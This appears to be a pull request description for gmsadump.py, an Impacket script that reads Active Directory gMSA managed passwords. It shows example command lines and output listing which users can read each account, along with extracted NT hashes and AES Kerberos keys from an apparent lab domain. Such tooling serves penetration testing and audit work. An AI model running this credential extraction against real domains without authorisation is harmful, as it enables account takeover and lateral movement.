* retrieve and parse `msDS-ManagedPassword` attribute t to extract the NT, and AES creds format
* display previous password in NT hash and AES kerberos key formats.
* Allow for selecting a specific gmsa(using `-gmsa`) object to enumerate who can read its `msDS-ManagedPassword`(name and sid)
* Allowing for the retrieval of a target gMSA objects credentials  via `-gmsa`. It also accepts wild cards, appends the `$` when not given
* implement a `-enum` flag that allows user to avoid extraction and only enum all gMSA objects and the readers ACLs

## Sample Output

For example using the -enum flag with specifying a target, it will only enum that:

```bash
└─$ time python3 gmsadump.py dmz.domain.comi/meowmeowbinks:PasswordSuper10+ -dc-ip 192.168.133.60 -enum -gmsa svc-gMSA-10
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] [+] Using plain LDAP with NTLM Sign+Seal.
[*] Querying 192.168.133.60 for gMSA objects.

[*] Account:    svc-gMSA-10$
    [*]Readable by:
      - user91 (S-1-5-21-4829137541-2641803372-908776154-1711)
      - user92 (S-1-5-21-4829137541-2641803372-908776154-1712)
      - user93 (S-1-5-21-4829137541-2641803372-908776154-1713)
      - user94 (S-1-5-21-4829137541-2641803372-908776154-1714)
      - user95 (S-1-5-21-4829137541-2641803372-908776154-1715)
      - user96 (S-1-5-21-4829137541-2641803372-908776154-1716)
      - user97 (S-1-5-21-4829137541-2641803372-908776154-1717)
      - user98 (S-1-5-21-4829137541-2641803372-908776154-1718)
      - user99 (S-1-5-21-4829137541-2641803372-908776154-1719)
      - user100 (S-1-5-21-4829137541-2641803372-908776154-1720)


real    1.80s
user    0.17s
sys     0.03s
cpu     11%
```

By default, it will extract all the gmsas your calling user can extract while also printing out which other gMSA objects are present + who can read those:

```bash
└─$ time python3 gmsadump.py dmz.domain.com/meowmeowbinks:PasswordSuper10+ -dc-ip 192.168.133.60 -debug                 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] [*] Connecting to ldap://192.168.133.60
[+] Connecting to 192.168.133.60, port 389, SSL False, signing True
[+] [*] Authenticating with NTLM
[*] [+] Using plain LDAP with NTLM Sign+Seal.
[*] Querying 192.168.133.60 for gMSA objects.
[+] Search filter: (&(objectClass=msDS-GroupManagedServiceAccount))
[+] Attributes requested: ['sAMAccountName', 'msDS-GroupMSAMembership', 'msDS-ManagedPassword']

[*] Account:    dmzsvcgmsa$
    [*]Readable by:
      - Domain Users (S-1-5-21-4829137541-2641803372-908776154-513)
      - Domain Computers (S-1-5-21-4829137541-2641803372-908776154-515)
      - dadmin (S-1-5-21-4829137541-2641803372-908776154-1106)
      - meowmeowbinks (S-1-5-21-4829137541-2641803372-908776154-1608)
    dmzsvcgmsa$::::f402e86e144f8ffdbf6cb3234c38551f
    dmzsvcgmsa$:aes256-cts-hmac-sha1-96:012e473fec16e6c1c854008d7fcaf770e21473b5496f0dea221f45052cd53d6b
    dmzsvcgmsa$:aes128-cts-hmac-sha1-96:d8cd81bc7b680058252e8c8e116b5f6c

    [Previous Password]
    dmzsvcgmsa$::::c6490ecce53b223e80f3ed60c8da0ce0
    dmzsvcgmsa$:aes256-cts-hmac-sha1-96:b52b9490c32da232c52116a7a47d88bf077887ad8dd3d767dec90fa773b1a0d0
    dmzsvcgmsa$:aes128-cts-hmac-sha1-96:439e2e09b0f75da09ad6003bfb08123a

[*] Account:    svc-gMSA-1$
    [*]Readable by:
      - user1 (S-1-5-21-4829137541-2641803372-908776154-1621)
      - user2 (S-1-5-21-4829137541-2641803372-908776154-1622)
      - user3 (S-1-5-21-4829137541-2641803372-908776154-1623)
      - user4 (S-1-5-21-4829137541-2641803372-908776154-1624)
      - user5 (S-1-5-21-4829137541-2641803372-908776154-1625)
      - user6 (S-1-5-21-4829137541-2641803372-908776154-1626)
      - user7 (S-1-5-21-4829137541-2641803372-908776154-1627)
      - user8 (S-1-5-21-4829137541-2641803372-908776154-1628)
      - user9 (S-1-5-21-4829137541-2641803372-908776154-1629)
      - user10 (S-1-5-21-4829137541-2641803372-908776154-1630)
[*] msDS-ManagedPassword not returned (this account may not be authorized to read it)

[*] Account:    svc-gMSA-2$
    [*]Readable by:
      - user11 (S-1-5-21-4829137541-2641803372-908776154-1631)
      - user12 (S-1-5-21-4829137541-2641803372-908776154-1632)
      - user13 (S-1-5-21-4829137541-2641803372-908776154-1633)
      - user14 (S-1-5-21-4829137541-2641803372-908776154-1634)
      - user15 (S-1-5-21-4829137541-2641803372-908776154-1635)
      - user16 (S-1-5-21-4829137541-2641803372-908776154-1636)
      - user17 (S-1-5-21-4829137541-2641803372-908776154-1637)
      - user18 (S-1-5-21-4829137541-2641803372-908776154-1638)
      - user19 (S-1-5-21-4829137541-2641803372-908776154-1639)
      - user20 (S-1-5-21-4829137541-2641803372-908776154-1640)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-3$
    [*]Readable by:
      - user21 (S-1-5-21-4829137541-2641803372-908776154-1641)
      - user22 (S-1-5-21-4829137541-2641803372-908776154-1642)
      - user23 (S-1-5-21-4829137541-2641803372-908776154-1643)
      - user24 (S-1-5-21-4829137541-2641803372-908776154-1644)
      - user25 (S-1-5-21-4829137541-2641803372-908776154-1645)
      - user26 (S-1-5-21-4829137541-2641803372-908776154-1646)
      - user27 (S-1-5-21-4829137541-2641803372-908776154-1647)
      - user28 (S-1-5-21-4829137541-2641803372-908776154-1648)
      - user29 (S-1-5-21-4829137541-2641803372-908776154-1649)
      - user30 (S-1-5-21-4829137541-2641803372-908776154-1650)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-4$
    [*]Readable by:
      - user31 (S-1-5-21-4829137541-2641803372-908776154-1651)
      - user32 (S-1-5-21-4829137541-2641803372-908776154-1652)
      - user33 (S-1-5-21-4829137541-2641803372-908776154-1653)
      - user34 (S-1-5-21-4829137541-2641803372-908776154-1654)
      - user35 (S-1-5-21-4829137541-2641803372-908776154-1655)
      - user36 (S-1-5-21-4829137541-2641803372-908776154-1656)
      - user37 (S-1-5-21-4829137541-2641803372-908776154-1657)
      - user38 (S-1-5-21-4829137541-2641803372-908776154-1658)
      - user39 (S-1-5-21-4829137541-2641803372-908776154-1659)
      - user40 (S-1-5-21-4829137541-2641803372-908776154-1660)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-5$
    [*]Readable by:
      - user41 (S-1-5-21-4829137541-2641803372-908776154-1661)
      - user42 (S-1-5-21-4829137541-2641803372-908776154-1662)
      - user43 (S-1-5-21-4829137541-2641803372-908776154-1663)
      - user44 (S-1-5-21-4829137541-2641803372-908776154-1664)
      - user45 (S-1-5-21-4829137541-2641803372-908776154-1665)
      - user46 (S-1-5-21-4829137541-2641803372-908776154-1666)
      - user47 (S-1-5-21-4829137541-2641803372-908776154-1667)
      - user48 (S-1-5-21-4829137541-2641803372-908776154-1668)
      - user49 (S-1-5-21-4829137541-2641803372-908776154-1669)
      - user50 (S-1-5-21-4829137541-2641803372-908776154-1670)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-6$
    [*]Readable by:
      - user51 (S-1-5-21-4829137541-2641803372-908776154-1671)
      - user52 (S-1-5-21-4829137541-2641803372-908776154-1672)
      - user53 (S-1-5-21-4829137541-2641803372-908776154-1673)
      - user54 (S-1-5-21-4829137541-2641803372-908776154-1674)
      - user55 (S-1-5-21-4829137541-2641803372-908776154-1675)
      - user56 (S-1-5-21-4829137541-2641803372-908776154-1676)
      - user57 (S-1-5-21-4829137541-2641803372-908776154-1677)
      - user58 (S-1-5-21-4829137541-2641803372-908776154-1678)
      - user59 (S-1-5-21-4829137541-2641803372-908776154-1679)
      - user60 (S-1-5-21-4829137541-2641803372-908776154-1680)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-7$
    [*]Readable by:
      - user61 (S-1-5-21-4829137541-2641803372-908776154-1681)
      - user62 (S-1-5-21-4829137541-2641803372-908776154-1682)
      - user63 (S-1-5-21-4829137541-2641803372-908776154-1683)
      - user64 (S-1-5-21-4829137541-2641803372-908776154-1684)
      - user65 (S-1-5-21-4829137541-2641803372-908776154-1685)
      - user66 (S-1-5-21-4829137541-2641803372-908776154-1686)
      - user67 (S-1-5-21-4829137541-2641803372-908776154-1687)
      - user68 (S-1-5-21-4829137541-2641803372-908776154-1688)
      - user69 (S-1-5-21-4829137541-2641803372-908776154-1689)
      - user70 (S-1-5-21-4829137541-2641803372-908776154-1690)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-8$
    [*]Readable by:
      - user71 (S-1-5-21-4829137541-2641803372-908776154-1691)
      - user72 (S-1-5-21-4829137541-2641803372-908776154-1692)
      - user73 (S-1-5-21-4829137541-2641803372-908776154-1693)
      - user74 (S-1-5-21-4829137541-2641803372-908776154-1694)
      - user75 (S-1-5-21-4829137541-2641803372-908776154-1695)
      - user76 (S-1-5-21-4829137541-2641803372-908776154-1696)
      - user77 (S-1-5-21-4829137541-2641803372-908776154-1697)
      - user78 (S-1-5-21-4829137541-2641803372-908776154-1698)
      - user79 (S-1-5-21-4829137541-2641803372-908776154-1699)
      - user80 (S-1-5-21-4829137541-2641803372-908776154-1700)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-9$
    [*]Readable by:
      - user81 (S-1-5-21-4829137541-2641803372-908776154-1701)
      - user82 (S-1-5-21-4829137541-2641803372-908776154-1702)
      - user83 (S-1-5-21-4829137541-2641803372-908776154-1703)
      - user84 (S-1-5-21-4829137541-2641803372-908776154-1704)
      - user85 (S-1-5-21-4829137541-2641803372-908776154-1705)
      - user86 (S-1-5-21-4829137541-2641803372-908776154-1706)
      - user87 (S-1-5-21-4829137541-2641803372-908776154-1707)
      - user88 (S-1-5-21-4829137541-2641803372-908776154-1708)
      - user89 (S-1-5-21-4829137541-2641803372-908776154-1709)
      - user90 (S-1-5-21-4829137541-2641803372-908776154-1710)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

[*] Account:    svc-gMSA-10$
    [*]Readable by:
      - user91 (S-1-5-21-4829137541-2641803372-908776154-1711)
      - user92 (S-1-5-21-4829137541-2641803372-908776154-1712)
      - user93 (S-1-5-21-4829137541-2641803372-908776154-1713)
      - user94 (S-1-5-21-4829137541-2641803372-908776154-1714)
      - user95 (S-1-5-21-4829137541-2641803372-908776154-1715)
      - user96 (S-1-5-21-4829137541-2641803372-908776154-1716)
      - user97 (S-1-5-21-4829137541-2641803372-908776154-1717)
      - user98 (S-1-5-21-4829137541-2641803372-908776154-1718)
      - user99 (S-1-5-21-4829137541-2641803372-908776154-1719)
      - user100 (S-1-5-21-4829137541-2641803372-908776154-1720)
[*] msDS-ManagedPassword not returned (this account may not be authorised to read it)

real    13.08s
user    0.55s
sys     0.03s
cpu     4%
```

I made a PR prior but realized it was from my main branch instead of a separate one since I also opened a separate PR for badsuccor, in #2170 so I had to close it.

This one comes with many more improvements, better exception handling and more control over enumeration vs cred extraction. 